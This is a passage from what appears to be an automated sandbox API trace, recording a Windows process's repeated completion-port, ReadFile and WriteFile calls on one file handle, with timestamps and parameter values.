CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.526] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.528] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.528] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.552] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.554] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.555] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.555] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.557] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.558] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.559] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.559] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.578] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.579] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.580] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.580] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.582] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.583] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.605] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.605] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.615] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.617] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.618] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.618] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.620] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.621] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.622] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.623] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.633] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.634] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.635] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.635] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.637] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.638] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.640] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.640] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.700] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.702] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.703] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.703] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.704] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.706] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.707] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.707] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.717] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.718] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.720] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.720] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.729] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.730] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.732] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.732] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.761] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.763] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.764] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.764] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.766] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.767] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.769] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.769] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.778] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.780] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.781] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.781] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.783] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.784] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.785] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.785] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.816] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.817] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.819] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.819] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.829] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.830] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.832] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.832] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.849] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.851] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.853] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.853] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.862] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.864] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.865] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.865] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.875] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.877] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.878] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.878] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.892] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.894] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0141.895] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0141.895] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0141.905] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, 